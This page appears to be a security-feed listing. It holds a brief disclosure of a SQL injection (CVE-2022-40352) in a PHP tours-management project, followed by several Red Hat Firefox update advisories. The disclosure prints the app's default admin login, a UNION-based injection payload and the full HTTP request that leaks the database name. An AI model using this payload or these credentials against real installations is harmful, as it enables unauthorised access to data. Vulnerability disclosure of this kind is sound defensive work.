Online Tours & Travels Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/update_traveller.php.

**Online Tours & Travels management system v1.0 by mayuri\_k has SQL injection**

BUG\_Author: Bains

Login account: mayuri.infospace@gmail.com/admin (Super Admin account)

vendors: https://www.sourcecodester.com/php/14510/online-tours-travels-management-system-project-using-php-and-mysql.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /tour/admin/update\_traveller.php

Vulnerability location: /tour/admin/update\_traveller.php?id=, id

dbname = tour1

\[+\] Payload: /tour/admin/update\_traveller.php?id=-1%27%20union%20select%201,database(),3,4,5,6,7,8,9,10--+ // Leak place ---> id

GET /tour/admin/update\_traveller.php?id\=\-1%27%20union%20select%201,database(),3,4,5,6,7,8,9,10\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=g29omi7f91g3h7ud1uhq6rbmkv
Connection: close

CVE-2022-40352: Bug_report/SQLi-1.md at main · songbingxue/Bug_report

Red Hat Security Advisory 2022-6700-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 102.3.0 ESR. Issues addressed include a bypass vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: firefox security update  
Advisory ID:       RHSA-2022:6700-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6700  
Issue date:        2022-09-26  
CVE Names:         CVE-2022-40956 CVE-2022-40957 CVE-2022-40958   
                   CVE-2022-40959 CVE-2022-40960 CVE-2022-40962   
=====================================================================

1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards  
compliance, performance, and portability.

This update upgrades Firefox to version 102.3.0 ESR.

Security Fix(es):

* Mozilla: Bypassing FeaturePolicy restrictions on transient pages  
(CVE-2022-40959)

* Mozilla: Data-race when parsing non-UTF-8 URLs in threads  
(CVE-2022-40960)

* Mozilla: Memory safety bugs fixed in Firefox 105 and Firefox ESR 102.3  
(CVE-2022-40962)

* Mozilla: Bypassing Secure Context restriction for cookies with __Host and  
__Secure prefix (CVE-2022-40958)

* Mozilla: Content-Security-Policy base-uri bypass (CVE-2022-40956)

* Mozilla: Incoherent instruction cache when building WASM on ARM64  
(CVE-2022-40957)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2128792 - CVE-2022-40959 Mozilla: Bypassing FeaturePolicy restrictions on transient pages  
2128793 - CVE-2022-40960 Mozilla: Data-race when parsing non-UTF-8 URLs in threads  
2128794 - CVE-2022-40958 Mozilla: Bypassing Secure Context restriction for cookies with __Host and __Secure prefix  
2128795 - CVE-2022-40956 Mozilla: Content-Security-Policy base-uri bypass  
2128796 - CVE-2022-40957 Mozilla: Incoherent instruction cache when building WASM on ARM64  
2128797 - CVE-2022-40962 Mozilla: Memory safety bugs fixed in Firefox 105 and Firefox ESR 102.3

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
firefox-102.3.0-6.el9_0.src.rpm

aarch64:  
firefox-102.3.0-6.el9_0.aarch64.rpm  
firefox-debuginfo-102.3.0-6.el9_0.aarch64.rpm  
firefox-debugsource-102.3.0-6.el9_0.aarch64.rpm

ppc64le:  
firefox-102.3.0-6.el9_0.ppc64le.rpm  
firefox-debuginfo-102.3.0-6.el9_0.ppc64le.rpm  
firefox-debugsource-102.3.0-6.el9_0.ppc64le.rpm

s390x:  
firefox-102.3.0-6.el9_0.s390x.rpm  
firefox-debuginfo-102.3.0-6.el9_0.s390x.rpm  
firefox-debugsource-102.3.0-6.el9_0.s390x.rpm

x86_64:  
firefox-102.3.0-6.el9_0.x86_64.rpm  
firefox-debuginfo-102.3.0-6.el9_0.x86_64.rpm  
firefox-debugsource-102.3.0-6.el9_0.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-40956  
https://access.redhat.com/security/cve/CVE-2022-40957  
https://access.redhat.com/security/cve/CVE-2022-40958  
https://access.redhat.com/security/cve/CVE-2022-40959  
https://access.redhat.com/security/cve/CVE-2022-40960  
https://access.redhat.com/security/cve/CVE-2022-40962  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYzH0g9zjgjWX9erEAQi/KA//ZzK9nVVUCVg7lC1rep2cJtZ5GT59QqlP  
QGuCkAnW8O05DBBjHnBIMLhioph2GFGw/A4oBxWijtZXshI5GB/AdQ70GJsbrYJ6  
V7zOE/AO3QOZIWytLjm1wamuIAy2q0ffHVPXuMFyLQ7iU+1RjzEEZOALzVm8p67s  
9mxnDTchhaq+ebDkmYk3qsS83WtQwCIhvz5gu+pXbbAzt9dGg/qc0i+QVedZ0cZX  
LxvbO2F28q/NnjPEmJAWVXgG8HgR7QjmBrVGzYWMOfmXG94sVYCp/dyQy/tOHL6t  
LUZexJJwwihGpveSEDv2KiIfk7IdzSUS93yCL1k0PcU6vvRh8QR977jHYEcpHOrW  
7EsVF+0wUHde9AYaJWfNxGHOWLVbKVR4J1jHZNnfU9eFzeZcRQzXqUPy57mX6yVY  
2n7wE7J34A4Py7lH0QsZzTY0tW0ByL0WXrX63vrij5sugr4LlIZOJcf6xEPeL79A  
YS9Ggc11KvNpMZ0/9fI8fvbP3GMX+QWUWU7f6KI5LBloi+/aRE8+jx9hYtZwtTmV  
tOEqqX5T0ZMvlvEHjdeTM5SpjeInZqS/EbVArWwFjWeprKhz5prtsyApKgHXlRRw  
J1DrNnRvBAAsb5MTzn3zQMHxrl2LwujdKzEZDL2QOEOOybHu+tKGhLB1r7kVpKoZ  
q9To96uLFnE=  
=GZRD  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6700-01

Red Hat Security Advisory 2022-6701-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 102.3.0 ESR. Issues addressed include a bypass vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: firefox security update  
Advisory ID:       RHSA-2022:6701-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6701  
Issue date:        2022-09-26  
CVE Names:         CVE-2022-40956 CVE-2022-40957 CVE-2022-40958   
                   CVE-2022-40959 CVE-2022-40960 CVE-2022-40962   
=====================================================================

1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 8.4  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.8.4) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards  
compliance, performance, and portability.

This update upgrades Firefox to version 102.3.0 ESR.

Security Fix(es):

* Mozilla: Bypassing FeaturePolicy restrictions on transient pages  
(CVE-2022-40959)

* Mozilla: Data-race when parsing non-UTF-8 URLs in threads  
(CVE-2022-40960)

* Mozilla: Memory safety bugs fixed in Firefox 105 and Firefox ESR 102.3  
(CVE-2022-40962)

* Mozilla: Bypassing Secure Context restriction for cookies with __Host and  
__Secure prefix (CVE-2022-40958)

* Mozilla: Content-Security-Policy base-uri bypass (CVE-2022-40956)

* Mozilla: Incoherent instruction cache when building WASM on ARM64  
(CVE-2022-40957)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2128792 - CVE-2022-40959 Mozilla: Bypassing FeaturePolicy restrictions on transient pages  
2128793 - CVE-2022-40960 Mozilla: Data-race when parsing non-UTF-8 URLs in threads  
2128794 - CVE-2022-40958 Mozilla: Bypassing Secure Context restriction for cookies with __Host and __Secure prefix  
2128795 - CVE-2022-40956 Mozilla: Content-Security-Policy base-uri bypass  
2128796 - CVE-2022-40957 Mozilla: Incoherent instruction cache when building WASM on ARM64  
2128797 - CVE-2022-40962 Mozilla: Memory safety bugs fixed in Firefox 105 and Firefox ESR 102.3

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.8.4):

Source:  
firefox-102.3.0-6.el8_4.src.rpm

aarch64:  
firefox-102.3.0-6.el8_4.aarch64.rpm  
firefox-debuginfo-102.3.0-6.el8_4.aarch64.rpm  
firefox-debugsource-102.3.0-6.el8_4.aarch64.rpm

ppc64le:  
firefox-102.3.0-6.el8_4.ppc64le.rpm  
firefox-debuginfo-102.3.0-6.el8_4.ppc64le.rpm  
firefox-debugsource-102.3.0-6.el8_4.ppc64le.rpm

s390x:  
firefox-102.3.0-6.el8_4.s390x.rpm  
firefox-debuginfo-102.3.0-6.el8_4.s390x.rpm  
firefox-debugsource-102.3.0-6.el8_4.s390x.rpm

x86_64:  
firefox-102.3.0-6.el8_4.x86_64.rpm  
firefox-debuginfo-102.3.0-6.el8_4.x86_64.rpm  
firefox-debugsource-102.3.0-6.el8_4.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-40956  
https://access.redhat.com/security/cve/CVE-2022-40957  
https://access.redhat.com/security/cve/CVE-2022-40958  
https://access.redhat.com/security/cve/CVE-2022-40959  
https://access.redhat.com/security/cve/CVE-2022-40960  
https://access.redhat.com/security/cve/CVE-2022-40962  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYzH0edzjgjWX9erEAQhqBQ/6Ak5GcRn6T8IHAXY/o/+AtiO4v468xq31  
CtcUN4PhJLFaW71flbYmwM80wjUGzUwme6ZMJTTdL4frq45XeUhGMXm7RxXdD/6l  
8xXe/d2/C/KOSNFbnhMsGcBt2VHIFkZsbCSvKq9yX5nUByvYZ8hMYek9DtNDZIHt  
oCt4rUXHVcr/WQHg0TBIy/EnUoD60Fn/TlXNMEYXRzY40WMw28JEsPwQGKecjqxl  
YXmRiPtoCUjqM50hPL37meSeDwGLV7c/vxGZ3yTTQQSx9mm8ylvnV+eiE3UFKPy6  
dF1/ldIdfkzJB9YzbIUxfU4nGYMwdUXxp+hRtjU+/cNBt68PGbN9EUywZ8/Nhi2W  
ukJTdOMfW3FrzgC+sUAL+M2pCVOE3edXUlc6s+uHjkzuoYK7mt8gLwqZrjGslYKf  
71trCB56dBZlc2S+g39XqZVu4NWyUwHWEC74gNztDrJPfKlcSs7hkFTkzPST7nJf  
lkmkrRd1ElQrHx4U8xdPPdEh6Cdb4jdyfBcJuiPc/ISlB4/3McYwS75sZ6ko/9BF  
UPDHyrQR5lwV20MpCHptfFHWFS4T3Fp7cF+Oup5v2y7HoZccDaY2UkLIxJgf0ioT  
XtUVXOJpHfrqkVCbgIHW3/5nJL8qibPj0jQz4+cOv2Zkq3QQ9zfGj96BHou8Im0T  
cEMEwtK16iE=  
=7F+k  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6701-01

Red Hat Security Advisory 2022-6702-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 102.3.0 ESR. Issues addressed include a bypass vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: firefox security update  
Advisory ID:       RHSA-2022:6702-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6702  
Issue date:        2022-09-26  
CVE Names:         CVE-2022-40956 CVE-2022-40957 CVE-2022-40958   
                   CVE-2022-40959 CVE-2022-40960 CVE-2022-40962   
=====================================================================

1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards  
compliance, performance, and portability.

This update upgrades Firefox to version 102.3.0 ESR.

Security Fix(es):

* Mozilla: Bypassing FeaturePolicy restrictions on transient pages  
(CVE-2022-40959)

* Mozilla: Data-race when parsing non-UTF-8 URLs in threads  
(CVE-2022-40960)

* Mozilla: Memory safety bugs fixed in Firefox 105 and Firefox ESR 102.3  
(CVE-2022-40962)

* Mozilla: Bypassing Secure Context restriction for cookies with __Host and  
__Secure prefix (CVE-2022-40958)

* Mozilla: Content-Security-Policy base-uri bypass (CVE-2022-40956)

* Mozilla: Incoherent instruction cache when building WASM on ARM64  
(CVE-2022-40957)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2128792 - CVE-2022-40959 Mozilla: Bypassing FeaturePolicy restrictions on transient pages  
2128793 - CVE-2022-40960 Mozilla: Data-race when parsing non-UTF-8 URLs in threads  
2128794 - CVE-2022-40958 Mozilla: Bypassing Secure Context restriction for cookies with __Host and __Secure prefix  
2128795 - CVE-2022-40956 Mozilla: Content-Security-Policy base-uri bypass  
2128796 - CVE-2022-40957 Mozilla: Incoherent instruction cache when building WASM on ARM64  
2128797 - CVE-2022-40962 Mozilla: Memory safety bugs fixed in Firefox 105 and Firefox ESR 102.3

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
firefox-102.3.0-6.el8_6.src.rpm

aarch64:  
firefox-102.3.0-6.el8_6.aarch64.rpm  
firefox-debuginfo-102.3.0-6.el8_6.aarch64.rpm  
firefox-debugsource-102.3.0-6.el8_6.aarch64.rpm

ppc64le:  
firefox-102.3.0-6.el8_6.ppc64le.rpm  
firefox-debuginfo-102.3.0-6.el8_6.ppc64le.rpm  
firefox-debugsource-102.3.0-6.el8_6.ppc64le.rpm

s390x:  
firefox-102.3.0-6.el8_6.s390x.rpm  
firefox-debuginfo-102.3.0-6.el8_6.s390x.rpm  
firefox-debugsource-102.3.0-6.el8_6.s390x.rpm

x86_64:  
firefox-102.3.0-6.el8_6.x86_64.rpm  
firefox-debuginfo-102.3.0-6.el8_6.x86_64.rpm  
firefox-debugsource-102.3.0-6.el8_6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-40956  
https://access.redhat.com/security/cve/CVE-2022-40957  
https://access.redhat.com/security/cve/CVE-2022-40958  
https://access.redhat.com/security/cve/CVE-2022-40959  
https://access.redhat.com/security/cve/CVE-2022-40960  
https://access.redhat.com/security/cve/CVE-2022-40962  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYzH0b9zjgjWX9erEAQjsCA//RRcwMcwRGfgQ9cAGMZ3ba3+kMmPoAxTP  
NkvTCyngoO+dEnyUWyOBW5VjdHW4Oswj8ZwQyW2JDBhvgveh7+5UOpjSOy242cJ/  
3etJgTwowzzD0LbwooeYHn4n/GDTlLJyZ0m0EE8agAnxYqDKElQ6mGhkSeayueuq  
gc4s+R0J2p7eiEZ5Wng5JuDLjNoGbblYkHoQcEeIhC4vyOwsDkDwKLWkWyiO55H8  
k2i+ZV/ae8f/rvui43qMShUTxS/8UtWFTvdVQeGP4sS39oi0tFBH75gsSW8Xy0zE  
A9JxAIjisdrIMlAyg2s44eMef2vQUxSYpwlPsJ7LIumtOmG6Wz3TTViz2fWnqxdP  
iZMENdC6YHW+abLlYQreRoYP5a2HtqmTkX5j1B30wsmJnhSNByJ0YLcDRXedIKtG  
2toV40uX/ECoLqeD1Xm0RP2AHaUABkxhjT7FNBHTSCeV8y4+JFpIIZR8hbSg0eho  
m47FitR2dRmCyA7EI5TUD05lzumBLRQGd5ULvgdZMdIffV46gX9iwTXTxERI48Dg  
6WsJ59cwjyGeWHUeG/pIGJxW+jh+bdAK/CUvMhidzgx5FCb/IEXTKANhzSPyZ5ro  
a3+jGPtroycoaOvMuc6bTjkMzF88EXCucDdBba5tTfs0z8ho5ZqEoSFpYiAafqaf  
2qaEr+QRDNk=  
=IkCE  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6702-01

Red Hat Security Advisory 2022-6703-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 102.3.0 ESR. Issues addressed include a bypass vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: firefox security update  
Advisory ID:       RHSA-2022:6703-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6703  
Issue date:        2022-09-26  
CVE Names:         CVE-2022-40956 CVE-2022-40957 CVE-2022-40958   
                   CVE-2022-40959 CVE-2022-40960 CVE-2022-40962   
=====================================================================

1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 8.1  
Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream E4S (v. 8.1) - ppc64le, x86_64

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards  
compliance, performance, and portability.

This update upgrades Firefox to version 102.3.0 ESR.

Security Fix(es):

* Mozilla: Bypassing FeaturePolicy restrictions on transient pages  
(CVE-2022-40959)

* Mozilla: Data-race when parsing non-UTF-8 URLs in threads  
(CVE-2022-40960)

* Mozilla: Memory safety bugs fixed in Firefox 105 and Firefox ESR 102.3  
(CVE-2022-40962)

* Mozilla: Bypassing Secure Context restriction for cookies with __Host and  
__Secure prefix (CVE-2022-40958)

* Mozilla: Content-Security-Policy base-uri bypass (CVE-2022-40956)

* Mozilla: Incoherent instruction cache when building WASM on ARM64  
(CVE-2022-40957)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2128792 - CVE-2022-40959 Mozilla: Bypassing FeaturePolicy restrictions on transient pages  
2128793 - CVE-2022-40960 Mozilla: Data-race when parsing non-UTF-8 URLs in threads  
2128794 - CVE-2022-40958 Mozilla: Bypassing Secure Context restriction for cookies with __Host and __Secure prefix  
2128795 - CVE-2022-40956 Mozilla: Content-Security-Policy base-uri bypass  
2128796 - CVE-2022-40957 Mozilla: Incoherent instruction cache when building WASM on ARM64  
2128797 - CVE-2022-40962 Mozilla: Memory safety bugs fixed in Firefox 105 and Firefox ESR 102.3

6. Package List:

Red Hat Enterprise Linux AppStream E4S (v. 8.1):

Source:  
firefox-102.3.0-6.el8_1.src.rpm

ppc64le:  
firefox-102.3.0-6.el8_1.ppc64le.rpm  
firefox-debuginfo-102.3.0-6.el8_1.ppc64le.rpm  
firefox-debugsource-102.3.0-6.el8_1.ppc64le.rpm

x86_64:  
firefox-102.3.0-6.el8_1.x86_64.rpm  
firefox-debuginfo-102.3.0-6.el8_1.x86_64.rpm  
firefox-debugsource-102.3.0-6.el8_1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-40956  
https://access.redhat.com/security/cve/CVE-2022-40957  
https://access.redhat.com/security/cve/CVE-2022-40958  
https://access.redhat.com/security/cve/CVE-2022-40959  
https://access.redhat.com/security/cve/CVE-2022-40960  
https://access.redhat.com/security/cve/CVE-2022-40962  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYzH0YtzjgjWX9erEAQiFCg/6A22FZMDDiBFcw5xxNzawSZ7L4bdBC/QX  
CnYtzed0BFF4irQctN2nkvYJV3E6mWYKUnO1brqyixlnZtk8mjo97CgNoijEM6JP  
mA2qNRleC6KNU4mmz0GWwkJqz/iIWQ78X6CV7AnZSOQQrMh0cT743jO/+/bf/QW8  
NGSlLtYDdAkv6u/Nwdzp3VnzCO8IJFz2kQ7txIATnyw2eEUAlEXfkkPPGCCtIVuL  
23eVFQndO1rB1qblx3jsO/43xtyBoiMsf5UKJGitRLhWOV6/Z4w2Hk+L7i55N7sy  
FRFyvmJ76TefD5ymIoKDi3EN7tIEdOs1ousR6rbNljH1DF/czQliMRm/u2WdKUkL  
UfBEDT924UABK5wPOg6uaponT9GlOTW1jXaQsyDi+nLmxHV6I1l8kuY+d63VHeOs  
N0kcV00oq4FRPURc99wJAjo0uosY0Wm6elQJBTT0F20UMoaPtXDWFka+bp35lT02  
ufWuxsN8550DL/6lx6TePGQ0Z84NKY4FUnmy59Xbct7lCUyBewnZwme0VMK57a4+  
8WfDgLdk/rc0eLPjvwuEIoh6wqfocEh63Wy62imzo1QeDm25NAnH7VXzpXH2PMwF  
BSyUNzdVl2icVGFbXi9u7eU1b30sm7MsA7PvqzJiwpmA9eu8bky23zDGO3TKIEup  
CDxPUlXH9ys=  
=G7Tz  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6703-01

Red Hat Security Advisory 2022-6707-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 102.3.0 ESR. Issues addressed include a bypass vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: firefox security update  
Advisory ID:       RHSA-2022:6707-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6707  
Issue date:        2022-09-26  
CVE Names:         CVE-2022-40956 CVE-2022-40957 CVE-2022-40958   
                   CVE-2022-40959 CVE-2022-40960 CVE-2022-40962   
=====================================================================

1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 8.2  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v. 8.2) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards  
compliance, performance, and portability.

This update upgrades Firefox to version 102.3.0 ESR.

Security Fix(es):

* Mozilla: Bypassing FeaturePolicy restrictions on transient pages  
(CVE-2022-40959)

* Mozilla: Data-race when parsing non-UTF-8 URLs in threads  
(CVE-2022-40960)

* Mozilla: Memory safety bugs fixed in Firefox 105 and Firefox ESR 102.3  
(CVE-2022-40962)

* Mozilla: Bypassing Secure Context restriction for cookies with __Host and  
__Secure prefix (CVE-2022-40958)

* Mozilla: Content-Security-Policy base-uri bypass (CVE-2022-40956)

* Mozilla: Incoherent instruction cache when building WASM on ARM64  
(CVE-2022-40957)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2128792 - CVE-2022-40959 Mozilla: Bypassing FeaturePolicy restrictions on transient pages  
2128793 - CVE-2022-40960 Mozilla: Data-race when parsing non-UTF-8 URLs in threads  
2128794 - CVE-2022-40958 Mozilla: Bypassing Secure Context restriction for cookies with __Host and __Secure prefix  
2128795 - CVE-2022-40956 Mozilla: Content-Security-Policy base-uri bypass  
2128796 - CVE-2022-40957 Mozilla: Incoherent instruction cache when building WASM on ARM64  
2128797 - CVE-2022-40962 Mozilla: Memory safety bugs fixed in Firefox 105 and Firefox ESR 102.3

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v. 8.2):

Source:  
firefox-102.3.0-6.el8_2.src.rpm

aarch64:  
firefox-102.3.0-6.el8_2.aarch64.rpm  
firefox-debuginfo-102.3.0-6.el8_2.aarch64.rpm  
firefox-debugsource-102.3.0-6.el8_2.aarch64.rpm

ppc64le:  
firefox-102.3.0-6.el8_2.ppc64le.rpm  
firefox-debuginfo-102.3.0-6.el8_2.ppc64le.rpm  
firefox-debugsource-102.3.0-6.el8_2.ppc64le.rpm

s390x:  
firefox-102.3.0-6.el8_2.s390x.rpm  
firefox-debuginfo-102.3.0-6.el8_2.s390x.rpm  
firefox-debugsource-102.3.0-6.el8_2.s390x.rpm

x86_64:  
firefox-102.3.0-6.el8_2.x86_64.rpm  
firefox-debuginfo-102.3.0-6.el8_2.x86_64.rpm  
firefox-debugsource-102.3.0-6.el8_2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-40956  
https://access.redhat.com/security/cve/CVE-2022-40957  
https://access.redhat.com/security/cve/CVE-2022-40958  
https://access.redhat.com/security/cve/CVE-2022-40959  
https://access.redhat.com/security/cve/CVE-2022-40960  
https://access.redhat.com/security/cve/CVE-2022-40962  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYzH0VtzjgjWX9erEAQgniQ/8CCA4KMNvro67ndbv00AxPxKJIbzFRIP5  
B2GFFWQJFZisvpgnU2Nmb8t382AqZdqJZuGJDVBAEkPZ/KQHMD9KiE0Ucb2gxAk0  
YT/4TSk9o5aY3S577yblz7YbvUXKXclaa+pECwui77GLr+G9HO7q/CT1PKDQlSSM  
CVjjvdASJSbnjZwuLHzzvsItSyGFHB605e6eKq92QDP90bFxAhNrXVGjJU0zLhE/  
c8eIpp0NVOnz2nCUf/SrsqiADYMQyyBHdwVB+7PsmJ2NsB2gj8cqI2rOJ5r10mr3  
bC5SMK1LbX4ha7iw99WU/5Z5VFnxq4dPJK4wAhBwUscb1iHUBU6UDTclTJxPgarY  
YcRs+GTgppP8dbq8/5SuU78we3OeDiJW+7CZeuA5B9DgR6hOkSL9xtusYAhQmnE1  
OOlgxe31RVaBON/5TjQqrSKn8wq4ijbOaLKCQszfLG4rz+bGjBsR7vfCWzt3QZ6Q  
1C8/BJpRpl5cujcWxvc/FT0x3J2nKUuL8g3OM5zvJdskibsZIyHCoi4yU0+KrKJZ  
ZAw3FRPXahXkTG97Ua9Xd4CwRHSrmNxxjA8Za1FV/daRTPkcFG4e0+EdOaAynT7V  
Wcm4ypDVL60VCnqupiuIkRImLumECzysaPQfA1E1MyXdq2aFMHtRWCC8NQA2QT0k  
SoINctHlA4U=  
=/8E1  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

